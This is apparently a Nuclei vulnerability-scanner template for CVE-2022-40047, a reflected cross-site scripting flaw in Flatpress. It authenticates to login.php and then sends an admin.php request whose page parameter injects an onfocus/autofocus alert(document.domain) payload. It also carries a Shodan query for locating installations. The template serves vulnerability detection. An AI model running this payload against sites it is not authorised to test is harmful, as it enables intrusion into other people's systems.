id: CVE-2022-40047 info: name: Flatpress < v1.2.1 - Cross Site Scripting author: r3Y3r53 severity: medium description: | Flatpress v1.2.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the page parameter at /flatpress/admin.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-40047 - https://github.com/flatpressblog/flatpress/issues/153 - http://flatpress.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-40047 cwe-id: CWE-79 epss-score: 0.00535 epss-percentile: 0.74485 cpe: cpe:2.3:a:flatpress:flatpress:1.2.1:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: flatpress product: flatpress shodan-query: http.html:"flatpress" tags: cve,cve2022,flatpress,authenticated,xss,intrusive variables: randstring: "{{to_lower(rand_base(16))}}" http: - raw: - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}} ------WebKitFormBoundary{{randstring}} Content-Disposition: form-data; name="user" {{username}} ------WebKitFormBoundary{{randstring}} Content-Disposition: form-data; name="pass" {{password}} ------WebKitFormBoundary{{randstring}} Content-Disposition: form-data; name="submit" Login ------WebKitFormBoundary{{randstring}}-- - | GET /admin.php?p=static&action=write&page=%22onfocus%3d%22alert%28document.domain%29%22autofocus%3d%22zr4da HTTP/1.1 Host: {{Hostname}} cookie-reuse: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(body_2, "flatpress")' - 'contains(content_type_2, "text/html")' - 'contains(body_2, "onfocus=\"alert(document.domain)")' condition: and # digest: 4a0a00473045022100f4b6ac28a14cbc23534eaefb3f698271fd437f0d84bd74abac7897c611ab405d022024cd91701409f0d500ad18d1124ecfa285dc6e8511903fd140b645256b4df379:922c64590222798bb761d5b6d8e72950